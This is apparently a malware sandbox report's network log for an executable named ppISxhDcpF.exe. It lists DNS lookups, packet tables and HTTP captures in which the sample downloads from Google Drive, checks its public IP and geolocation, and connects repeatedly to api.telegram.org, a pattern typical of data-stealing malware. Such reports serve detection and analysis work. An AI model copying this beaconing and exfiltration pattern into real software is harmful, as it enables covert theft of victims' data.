                                                                                                              Jan 10, 2025 20:10:51.217659950 CET44349956149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:51.217736959 CET49956443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:51.218308926 CET49956443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:51.218322039 CET44349956149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:51.223210096 CET8049912132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:51.223299026 CET4991280192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:51.263012886 CET4993880192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:51.844357014 CET44349956149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:51.846219063 CET49956443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:51.846237898 CET44349956149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:51.846483946 CET49956443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:51.846489906 CET44349956149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:52.335654974 CET44349956149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:52.335747957 CET44349956149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:52.335834026 CET49956443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:52.336338043 CET49956443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:52.339668989 CET4993880192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:52.340902090 CET4996380192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:52.344711065 CET8049938132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:52.344885111 CET4993880192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:52.345763922 CET8049963132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:52.345829010 CET4996380192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:52.345976114 CET4996380192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:52.350846052 CET8049963132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:54.302759886 CET8049963132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:54.304452896 CET49978443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:54.304487944 CET44349978149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:54.304577112 CET49978443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:54.304868937 CET49978443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:54.304883003 CET44349978149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:54.356754065 CET4996380192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:54.930381060 CET44349978149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:54.931937933 CET49978443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:54.931973934 CET44349978149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:54.932034016 CET49978443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:54.932049036 CET44349978149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:55.403397083 CET44349978149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:55.403486013 CET44349978149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:55.403609991 CET49978443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:55.404192924 CET49978443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:55.407728910 CET4996380192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:55.408931971 CET4998680192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:55.413933039 CET8049963132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:55.413950920 CET8049986132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:55.414010048 CET4996380192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:55.414043903 CET4998680192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:55.414172888 CET4998680192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:55.418890953 CET8049986132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:57.265990019 CET8049986132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:57.272813082 CET50000443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:57.272871017 CET44350000149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:57.273052931 CET50000443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:57.273598909 CET50000443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:57.273627043 CET44350000149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:57.309880018 CET4998680192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:57.954406977 CET44350000149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:57.997415066 CET50000443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:58.032275915 CET50000443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:58.032300949 CET44350000149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:58.032507896 CET50000443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:58.032516956 CET44350000149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:58.416729927 CET44350000149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:58.416821957 CET44350000149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:58.416882038 CET50000443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:58.417366982 CET50000443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:58.421036005 CET4998680192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:58.422161102 CET5000580192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:58.426095009 CET8049986132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:58.426152945 CET4998680192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:58.427059889 CET8050005132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:58.427124023 CET5000580192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:58.427280903 CET5000580192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:10:58.432113886 CET8050005132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:59.518470049 CET8050005132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:10:59.520168066 CET50006443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:59.520211935 CET44350006149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:59.520287037 CET50006443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:59.520675898 CET50006443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:10:59.520689011 CET44350006149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:10:59.560065985 CET5000580192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:00.151015043 CET44350006149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:11:00.154905081 CET50006443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:11:00.154923916 CET44350006149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:11:00.154983044 CET50006443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:11:00.154990911 CET44350006149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:11:00.510075092 CET44350006149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:11:00.510164022 CET44350006149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 20:11:00.510298014 CET50006443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:11:00.523283958 CET50006443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 20:11:00.655781984 CET5000580192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:00.656738997 CET5000780192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:00.660893917 CET8050005132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:11:00.660978079 CET5000580192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:00.661516905 CET8050007132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:11:00.661609888 CET5000780192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:00.661761045 CET5000780192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:00.666636944 CET8050007132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:11:03.670681000 CET8050007132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:11:03.716152906 CET5000780192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:06.070677996 CET5000880192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:06.075577021 CET8050008132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:11:06.075689077 CET5000880192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:06.075757980 CET5000880192.168.2.8132.226.8.169
                                                                                                              Jan 10, 2025 20:11:06.080523968 CET8050008132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:11:06.892231941 CET8050008132.226.8.169192.168.2.8
                                                                                                              Jan 10, 2025 20:11:06.934931993 CET5000880192.168.2.8132.226.8.169
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 10, 2025 20:10:02.042330980 CET4934453192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 20:10:02.050014973 CET53493441.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 20:10:03.468735933 CET5859953192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 20:10:03.476792097 CET53585991.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 20:10:08.423079967 CET6051253192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 20:10:08.429940939 CET53605121.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 20:10:17.159981966 CET5829853192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 20:10:17.168103933 CET53582981.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 20:10:24.736377001 CET5235053192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 20:10:24.743501902 CET53523501.1.1.1192.168.2.8
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 10, 2025 20:10:02.042330980 CET192.168.2.81.1.1.10x1526Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:03.468735933 CET192.168.2.81.1.1.10x188dStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:08.423079967 CET192.168.2.81.1.1.10xce26Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:17.159981966 CET192.168.2.81.1.1.10xa9e1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:24.736377001 CET192.168.2.81.1.1.10x1b09Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 10, 2025 20:10:02.050014973 CET1.1.1.1192.168.2.80x1526No error (0)drive.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:03.476792097 CET1.1.1.1192.168.2.80x188dNo error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:08.429940939 CET1.1.1.1192.168.2.80xce26No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:08.429940939 CET1.1.1.1192.168.2.80xce26No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:08.429940939 CET1.1.1.1192.168.2.80xce26No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:08.429940939 CET1.1.1.1192.168.2.80xce26No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:08.429940939 CET1.1.1.1192.168.2.80xce26No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:08.429940939 CET1.1.1.1192.168.2.80xce26No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:17.168103933 CET1.1.1.1192.168.2.80xa9e1No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:17.168103933 CET1.1.1.1192.168.2.80xa9e1No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:17.168103933 CET1.1.1.1192.168.2.80xa9e1No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:17.168103933 CET1.1.1.1192.168.2.80xa9e1No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:17.168103933 CET1.1.1.1192.168.2.80xa9e1No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:17.168103933 CET1.1.1.1192.168.2.80xa9e1No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:17.168103933 CET1.1.1.1192.168.2.80xa9e1No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 20:10:24.743501902 CET1.1.1.1192.168.2.80x1b09No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              • drive.google.com
                                                                                                              • drive.usercontent.google.com
                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • checkip.dyndns.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.849712132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:08.441741943 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 20:10:15.467886925 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:15 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 20:10:15.473562956 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 20:10:16.811794996 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:16 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 20:10:23.277862072 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 20:10:24.731668949 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:24 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.849784132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:26.127875090 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 20:10:26.973731041 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:26 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849795132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:27.883239031 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 20:10:28.721793890 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:28 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849807132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:29.595670938 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 20:10:30.451816082 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:30 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849822132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:31.378396034 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 20:10:32.206562996 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:32 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849836132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:33.291934013 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 20:10:34.176112890 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:34 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849853132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:35.297606945 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 20:10:37.120876074 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:36 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849868132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:38.097207069 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 20:10:38.951761961 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.849880132.226.8.169804932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 20:10:39.930825949 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 20:10:41.786953926 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:41 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
